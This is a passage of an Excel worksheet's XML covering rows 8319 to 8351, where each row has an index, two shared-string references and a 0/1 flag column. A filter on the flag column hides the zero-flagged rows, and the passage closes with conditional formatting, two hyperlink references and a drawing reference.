      <c r="B8319" s="1" t="s">
        <v>9842</v>
      </c>
      <c r="C8319" s="1" t="s">
        <v>7132</v>
      </c>
      <c r="D8319" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8320">
      <c r="A8320" s="1">
        <v>8318.0</v>
      </c>
      <c r="B8320" s="1" t="s">
        <v>3014</v>
      </c>
      <c r="C8320" s="1" t="s">
        <v>3015</v>
      </c>
      <c r="D8320" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8321" hidden="1">
      <c r="A8321" s="1">
        <v>8319.0</v>
      </c>
      <c r="B8321" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C8321" s="1" t="s">
        <v>6770</v>
      </c>
      <c r="D8321" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8322" hidden="1">
      <c r="A8322" s="1">
        <v>8320.0</v>
      </c>
      <c r="B8322" s="1" t="s">
        <v>3464</v>
      </c>
      <c r="C8322" s="1" t="s">
        <v>3465</v>
      </c>
      <c r="D8322" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8323" hidden="1">
      <c r="A8323" s="1">
        <v>8321.0</v>
      </c>
      <c r="B8323" s="1" t="s">
        <v>5505</v>
      </c>
      <c r="C8323" s="1" t="s">
        <v>5506</v>
      </c>
      <c r="D8323" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8324">
      <c r="A8324" s="1">
        <v>8322.0</v>
      </c>
      <c r="B8324" s="1" t="s">
        <v>9843</v>
      </c>
      <c r="C8324" s="1" t="s">
        <v>9844</v>
      </c>
      <c r="D8324" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8325" hidden="1">
      <c r="A8325" s="1">
        <v>8323.0</v>
      </c>
      <c r="B8325" s="1" t="s">
        <v>9845</v>
      </c>
      <c r="C8325" s="1" t="s">
        <v>9846</v>
      </c>
      <c r="D8325" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8326">
      <c r="A8326" s="1">
        <v>8324.0</v>
      </c>
      <c r="B8326" s="1" t="s">
        <v>9847</v>
      </c>
      <c r="C8326" s="1" t="s">
        <v>9848</v>
      </c>
      <c r="D8326" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8327" hidden="1">
      <c r="A8327" s="1">
        <v>8325.0</v>
      </c>
      <c r="B8327" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C8327" s="1" t="s">
        <v>7155</v>
      </c>
      <c r="D8327" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8328" hidden="1">
      <c r="A8328" s="1">
        <v>8326.0</v>
      </c>
      <c r="B8328" s="1" t="s">
        <v>3274</v>
      </c>
      <c r="C8328" s="1" t="s">
        <v>7512</v>
      </c>
      <c r="D8328" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8329" hidden="1">
      <c r="A8329" s="1">
        <v>8327.0</v>
      </c>
      <c r="B8329" s="1" t="s">
        <v>1249</v>
      </c>
      <c r="C8329" s="1" t="s">
        <v>1250</v>
      </c>
      <c r="D8329" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8330" hidden="1">
      <c r="A8330" s="1">
        <v>8328.0</v>
      </c>
      <c r="B8330" s="1" t="s">
        <v>3753</v>
      </c>
      <c r="C8330" s="1" t="s">
        <v>3754</v>
      </c>
      <c r="D8330" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8331" hidden="1">
      <c r="A8331" s="1">
        <v>8329.0</v>
      </c>
      <c r="B8331" s="1" t="s">
        <v>1353</v>
      </c>
      <c r="C8331" s="1" t="s">
        <v>1354</v>
      </c>
      <c r="D8331" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8332" hidden="1">
      <c r="A8332" s="1">
        <v>8330.0</v>
      </c>
      <c r="B8332" s="1" t="s">
        <v>1516</v>
      </c>
      <c r="C8332" s="1" t="s">
        <v>9849</v>
      </c>
      <c r="D8332" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8333" hidden="1">
      <c r="A8333" s="1">
        <v>8331.0</v>
      </c>
      <c r="B8333" s="1" t="s">
        <v>7812</v>
      </c>
      <c r="C8333" s="1" t="s">
        <v>7813</v>
      </c>
      <c r="D8333" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8334" hidden="1">
      <c r="A8334" s="1">
        <v>8332.0</v>
      </c>
      <c r="B8334" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C8334" s="1" t="s">
        <v>8804</v>
      </c>
      <c r="D8334" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8335" hidden="1">
      <c r="A8335" s="1">
        <v>8333.0</v>
      </c>
      <c r="B8335" s="1" t="s">
        <v>5051</v>
      </c>
      <c r="C8335" s="1" t="s">
        <v>5052</v>
      </c>
      <c r="D8335" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8336" hidden="1">
      <c r="A8336" s="1">
        <v>8334.0</v>
      </c>
      <c r="B8336" s="1" t="s">
        <v>1414</v>
      </c>
      <c r="C8336" s="1" t="s">
        <v>1415</v>
      </c>
      <c r="D8336" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8337" hidden="1">
      <c r="A8337" s="1">
        <v>8335.0</v>
      </c>
      <c r="B8337" s="1" t="s">
        <v>4814</v>
      </c>
      <c r="C8337" s="1" t="s">
        <v>9850</v>
      </c>
      <c r="D8337" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8338" hidden="1">
      <c r="A8338" s="1">
        <v>8336.0</v>
      </c>
      <c r="B8338" s="1" t="s">
        <v>64</v>
      </c>
      <c r="C8338" s="1" t="s">
        <v>65</v>
      </c>
      <c r="D8338" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8339" hidden="1">
      <c r="A8339" s="1">
        <v>8337.0</v>
      </c>
      <c r="B8339" s="1" t="s">
        <v>406</v>
      </c>
      <c r="C8339" s="1" t="s">
        <v>9555</v>
      </c>
      <c r="D8339" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8340" hidden="1">
      <c r="A8340" s="1">
        <v>8338.0</v>
      </c>
      <c r="B8340" s="1" t="s">
        <v>6663</v>
      </c>
      <c r="C8340" s="1" t="s">
        <v>6664</v>
      </c>
      <c r="D8340" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8341" hidden="1">
      <c r="A8341" s="1">
        <v>8339.0</v>
      </c>
      <c r="B8341" s="1" t="s">
        <v>8050</v>
      </c>
      <c r="C8341" s="1" t="s">
        <v>8051</v>
      </c>
      <c r="D8341" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8342" hidden="1">
      <c r="A8342" s="1">
        <v>8340.0</v>
      </c>
      <c r="B8342" s="1" t="s">
        <v>444</v>
      </c>
      <c r="C8342" s="1" t="s">
        <v>445</v>
      </c>
      <c r="D8342" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8343" hidden="1">
      <c r="A8343" s="1">
        <v>8341.0</v>
      </c>
      <c r="B8343" s="1" t="s">
        <v>3567</v>
      </c>
      <c r="C8343" s="1" t="s">
        <v>5740</v>
      </c>
      <c r="D8343" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8344" hidden="1">
      <c r="A8344" s="1">
        <v>8342.0</v>
      </c>
      <c r="B8344" s="1" t="s">
        <v>5925</v>
      </c>
      <c r="C8344" s="1" t="s">
        <v>5926</v>
      </c>
      <c r="D8344" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8345" hidden="1">
      <c r="A8345" s="1">
        <v>8343.0</v>
      </c>
      <c r="B8345" s="1" t="s">
        <v>512</v>
      </c>
      <c r="C8345" s="1" t="s">
        <v>7305</v>
      </c>
      <c r="D8345" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8346" hidden="1">
      <c r="A8346" s="1">
        <v>8344.0</v>
      </c>
      <c r="B8346" s="1" t="s">
        <v>140</v>
      </c>
      <c r="C8346" s="1" t="s">
        <v>9851</v>
      </c>
      <c r="D8346" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8347">
      <c r="A8347" s="1">
        <v>8345.0</v>
      </c>
      <c r="B8347" s="1" t="s">
        <v>1457</v>
      </c>
      <c r="C8347" s="1" t="s">
        <v>9852</v>
      </c>
      <c r="D8347" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8348">
      <c r="A8348" s="1">
        <v>8346.0</v>
      </c>
      <c r="B8348" s="1" t="s">
        <v>4316</v>
      </c>
      <c r="C8348" s="1" t="s">
        <v>8358</v>
      </c>
      <c r="D8348" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="8349" hidden="1">
      <c r="A8349" s="1">
        <v>8347.0</v>
      </c>
      <c r="B8349" s="1" t="s">
        <v>9853</v>
      </c>
      <c r="C8349" s="1" t="s">
        <v>9854</v>
      </c>
      <c r="D8349" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="8350" hidden="1"/>
    <row r="8351" hidden="1"/>
  </sheetData>
  <autoFilter ref="$D$1:$D$8351">
    <filterColumn colId="0">
      <filters>
        <filter val="1"/>
      </filters>
    </filterColumn>
  </autoFilter>
  <conditionalFormatting sqref="D1:D8351">
    <cfRule type="notContainsBlanks" dxfId="0" priority="1">
      <formula>LEN(TRIM(D1))&gt;0</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="C3291"/>
    <hyperlink r:id="rId2" ref="C6582"/>
  </hyperlinks>
  <drawing r:id="rId3"/>
</worksheet>
</file>